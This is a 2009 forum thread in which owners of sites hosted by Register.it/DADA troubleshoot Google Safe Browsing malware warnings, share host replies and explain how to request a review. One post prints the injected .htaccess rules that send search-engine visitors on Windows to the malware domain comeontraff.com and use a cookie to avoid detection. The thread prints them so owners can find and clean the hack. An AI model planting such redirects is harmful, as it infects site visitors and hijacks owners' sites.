http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.italysfinest.com/
Safe Browsing
Diagnostic page for italysfinest.com
What is the current listing status for italysfinest.com?
Site is listed as suspicious – visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 5 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-12-17, and the last time suspicious content was found on this site was on 2009-12-17.
Malicious software is hosted on 2 domain(s), including antyvirusaccessory.net/, comeontraff.com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including comeontraff.com/.
This site was hosted on 1 network(s) including AS12363 (DADA).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, italysfinest.com did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
• Return to the previous page.
• If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google’s Webmaster Help Center.
Updated 2 hours ago
There have been a number of sites that have [antyvirusaccessory .net/, comeontraff .com/.] listed in their Google SafeBrowsing Diagnostic reports.
In troubleshooting this yesterday, another community member [redleg] had observed that most/all sites on a shared server were experiencing problems with redirects to malicious sites. In one situation, the redirects for the sites on the shared server mysteriously disappeared. I do not know, at this point, if they have started back up again.
Considering the observations made yesterday about multiple sites on a shared server having the issue, this looks like a server problem that the hosting providers are going to have to be very diligent about trying to track down.
Do any of you have visitors reporting that they are being redirected to malicious sites when they try to access your site?
Same problem here, with Register.it, from yesterday.
http://www.google.com/safebrowsing/diagnostic?site=http://www.architectour.net/
Of the 22 pages we tested on the site over the past 90 days, 9 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-12-17, and the last time suspicious content was found on this site was on 2009-12-17.
Malicious software is hosted on 5 domain(s), including antyvirusaccessory.net/, securityonlineforum.net/, comeontraff.com/.
2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including comeontraff.com/, green-power-zone.com/.
This site was hosted on 1 network(s) including AS12363 (DADA).
Same here.
Italian site.
Register.it / dada.
http://badwarebusters.org/main/itemview/13115 for details.
Now my website seems ok (but adwords not working).
Any news from register?
Someone have news from adwords (if someone use this service)?
I hope google adwords team fix my campaing soooooon.
80% less visitor in one day….
Regarding AdWords …
It is my understanding that you must contact AdWords directly, if this caused problems with your AdWords account.
AdWords Account Suspension – Malware
https://adwords.google.com/support/aw/bin/answer.py?hl=en&answer=141633
Adwords Help Forum
http://www.google.com/support/forum/p/AdWords?hl=en
In addition, if your site is labeled with “This site may harm your computer” you must go through Google Webmaster Tools to get that warning label removed.
Google Webmaster Tools
https://www.google.com/webmasters/tools/
*Add the site to Google Webmaster Tools (If you haven’t already done so)
*Verify ownership of the site (If you haven’t already done so)
*Click the site so you can see the Dashboard for that site
*Click on [ More Details ] from the red malware warning bar
*Click on “Request a Review” and complete the form
*Wait a few hours to a day or so for the warning to be removed from the search results (IF the site is clean)
*Check your messages in Google Webmaster Tools for messages related to the status of your review
This hack has been very pervasive, has hit many servers and individual sites. In most cases the hosting service has cleaned up the problem but some individual sites are still infected.
First check to see if your site remains infected. You can use a tool that shows redirects like Rex Swain at http://www.rexswain.com/httpview.html
Enter your URL and be sure to enter http://www.google.com/ in the box labeled
Referer (optional)
If your site is still infected in the results you will see the page redirected to the malicious site comeontraff.com
If your site is not redirected go ahead and submit a request for review with Google. To remove a malware warning you must “Request a Review” in the Google Webmaster Tools Account for the site. Google Webmaster Tools can be accessed at this link
https://www.google.com/webmasters/tools/
If you do not all ready have a WMT account for the site you can create one
Access Google WMT at the link above
Then click the Add the site to Google Webmaster Tools button
Follow the directions to Verify ownership of the site
Once you have an account and verified ownership of the site
Click the link for the site which will take you to the Dashboard for the site
Click the link [ More Details ] from the red malware warning bar
Click the link “Request a Review” and submit the requested information.
Ref
http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites
If your site does redirect you need to check a file named .htaccess for suspicious redirects. Todate all of the infected sites have found the following code in their .htaccess file
RewriteEngine On
RewriteCond %{HTTP_COOKIE} !^.psessid=234845.$
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .ask.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteCond %{HTTP_USERAGENT} .Windows.$ [NC]
RewriteRule .* http:// comeontraff . com / go.php?sid=9 [R,L,CO=psessid:234845:%{HTTPHOST}:86400]
In most cases the hacker has inserted 100s of blank lines after any legitimate content in the file then inserted the hack lines. Be sure that you have scrolled down to the very bottom of the file. Once you have removed the redirect you will also need to follow the instructions above to remove the malware warning.
Good Luck
Register reply to me:
<hr />Gentile cliente,
Le confermiamo che i nostri server risultano in totale sicurezza e non sono presenti redirect server-side. Le confermiamo inoltre di aver ricevuto altre segnalazioni di questo tipo, anche per siti non ospitati sui nostri server. Stiamo pertanto cercando di contattare Google per verificare direttamente con loro il motivo di queste segnalazioni.
Le consigliamo comunque di effettuare una scansione del Suo sistema e dei file del sito dopo averli scaricati in locale. Successivamente, potrà procedere alla ripubblicazione e a completare la procedura indicata da Google alla pagina http://www.google.com/support/webmasters/bin/answer.py?answer=45432#3
Grazie e buona giornata.
Alessandra Franconi
Support Team
<del>-</del>——————
Register.it SpA
Translation of the Register Response:
We confirm that our servers are totally safe and there are no server-side redirect. We confirm also that he had received other reports of this kind, even for sites not hosted on our servers. So we are trying to contact Google to check directly with them the reason for these reports.
The still recommend running a scan of your system and your site’s files after downloading them locally. Thereafter, may proceed to republish and complete the steps from Google to page http://www.google.com/support/webmasters/bin/answer.py?answer=45432 # 3
Same mail from register.
@Redleg.
Thanks for your reply.
My .htaccess is ok, no suspicious code or other.
Date of modify is 08-25-2009, same date for most of the files (new site is up from this date).
In google wmt this morning (now seems ok) i see the malware details:
aurorasas .com/
www.aurorasas .com/
Checked yesterday many times and today with rexswain.com tools and nothing special, no redirect or other special.
I think our ISP have some problem…….
Same problem with google for many user with this in google details.
“This site was hosted on 1 network(s) including AS12363 (DADA)”
Today everything seems back to normal…
The Italian provider DADA has probably been hacked 2 days ago (as it had a down of around 10 minutes) and the support staff kept telling people that the provider was totally OK and that the culprit were the PCs of the owner of the websites have been infected… funny that the support staff dind’t even tell people to verify their DBs…
Now, I wonder if DADA/Register.it will ever tell us what really happened and if they really solved their vulnerabilities…
Shouldn’t they be legally liable for telling a lie to us and not helping us to solve a situation that they were responsible and that caused us loosing tens of thousands of visitors?
Anyway my suggestions is: DO NOT USE DADA or REGISTER.IT hosting till they explain us what happened and what they have done to solve the problem!!
This is not the first time that we open a ticket for technical problems (random 500 errors when sending email thru PHP mail()) and that they keep repeating that everything is OK. After I prepared a simple php script that demonstrate the problem, everything magically started working again, without any admittance by Register.
And this isn’t a problem of Register itself, but many other italian provider do this sort of things.
And this is why I am asking customer to migrate to us/de/uk hosting providers by months (ex: slicehost/linode vps have great customer support, every ticket I opened get closed in 10 minutes 365/365).
Some good news here.
—
We have processed your request for review of your website, http://architectour.net/. At this time, none of our data partners are reporting badware activity related to the site. Any warnings displayed by our partners about your site have either already been removed or should be removed shortly. In addition, the report(s) about this site in StopBadware’s Clearinghouse have been moved from “active” to “archived.”
For tips on keeping your website clean and secure, please visit: http://stopbadware.org/home/security
If you have further questions, please visit our online help & discussion community: BadwareBusters.org.
The StopBadware Team
—
So, is this a Google false positive or someone on Register has fixed the problem without saying anything to us?
Done my request yesterday.
Reply:
We have processed your request for review of your website, http://aurorasas.com/. At this time, none of our data partners are reporting badware activity related to the site. Any warnings displayed by our partners about your site have either already been removed or should be removed shortly. In addition, the report(s) about this site in StopBadware’s Clearinghouse have been moved from “active” to “archived.”
For tips on keeping your website clean and secure, please visit: http://stopbadware.org/home/security
If you have further questions, please visit our online help & discussion community: BadwareBusters.org.
The StopBadware Team
I don’t think is a google false positive, but several issue with many website and various isp, maybe our (and other) isp solved this problem and they don’t admit any guilt or similar…
Last thing, i’ve checked my site over 100 times yesterday… i have no ideas about this situation.
I hope our isp monitoring this post and this problems.
@nico
If you want your host to monitor the this conversation, you might want to provide them with a link to it.
Some providers will pick up on this type of thing because they are checking for things being posted on the internet about their services. However, if they don’t, it is always helpful it they are provided with links to discussions that their clients are having about issues with their sites that may be related to the hosting provider.
Reviews will be accomplished faster if you request them directly through Google. The process is automated, and reviews are generally completed within 24 hours (maybe even just a few hours).
If you go through StopBadware, that is a manual review process and the first thing they do is submit the site to Google for review (which you can do yourself.) They also don’t process the requests on weekends or holidays … only business days.
Instructions are at the bottom of the following post:
http://badwarebusters.org/main/itemview/13162#itemblock-13197
@filippog
You don’t want to ask for reconsideration. You want to “Request a Review.” Instructions are located toward the bottom of this post:
http://badwarebusters.org/main/itemview/13162#itemblock-13197
Other sites that were showing redirects yesterday, no longer are. So … it may be fixed. Try Requesting a Review and see what happens.
Register can say what they want, but I see many sites with many different CMS got malwared, even HTML static ones.
Addittionally, I checked our entire FTP against my latest GIT revision, and anything was modified on the cms.
And no, there wasn’t any custom rules in the .htaccess, it was the first thing I checked.
Lack of transparency.
Uh, who said that?
Our isp, register.it reply:
Sorry for italian, no time for translate.
Gentile Cliente,
In merito al problema riscontrato Le comunichiamo l’esito dell’analisi e
degli interventi effettuati dal nostro staff tecnico.
Alcuni domini ed alcune macchine della nostra infrastruttura sono stati
infettati a causa di una vulnerabilita’ aperta da un software Open source
installato sui nostri sistemi da alcuni clienti.
Si e’ trattato di un exploit htaccess molto complicato da individuare in
quanto reindirizzava le richieste provenienti solo più noti motori di
ricerca (Referer google, aol, altavista, msn, yahoo, ask) effettuate
esclusivamente tramite computer Windows.
Il nostro staff sistemistico ha lavorato ininterrottamente per individuare
ed eliminare il problema aggiungendo al sistema le patch di sicurezza
affinche’ questo non si ripeta.
Abbiamo utilizzato tutti i nostri canali di contatto con google affinchè la
rimozione della segnalazione di malware sulle pagine dei risultati del
motore di ricerca Google avvenisse il più rapidamente possibile e già nella
serata di venerdì 18 le segnalazioni sono fortemente diminuite. Il problema
è totalmente rientrato nella notte tra il 18 ed il 19 dicembre.
La ringraziamo per la Sua segnalazione che insieme a quella degli altri
clienti coinvolti è stata utile all’individuazione e risoluzione del
problema, non esiti a contattarci qualora riscontrasse ulteriori problemi.
Grazie per la cortese collaborazione.
Barbara Piarulli
Support Team
English translation of register .it email …
Dear Customer,
Regarding the problem it of the outcome of the analysis and
of speeches made by our technical staff.
Some domains of our infrastructure and some machinery were
infected because of a vulnerability ’opened by an open source software
installed on our systems by some customers.
Yes and ’treatment of an exploit htaccess very complicated to identify
As redirect requests from only the most famous engines
research (Referer Google, AOL, AltaVista, MSN, Yahoo, Ask) made
exclusively through your Windows computer.
Our staff has worked continuously to identify systems’
and eliminate the problem by adding to the system security patches
so that ’this does not happen again.
We used all our channels of contact with Google so that the
removing malware alert on results pages
Google search engine to happen as quickly as possible and already in
evening of Friday 18 reports are strongly decreased. The problem
is totally back in the night between 18 and 19 December.
Thank you for your complaint that together with that of other
customers involved was relevant to an investigation and resolution of
problem, do not hesitate to contact us should you encounter any further problems.
Thank you for your kind cooperation.
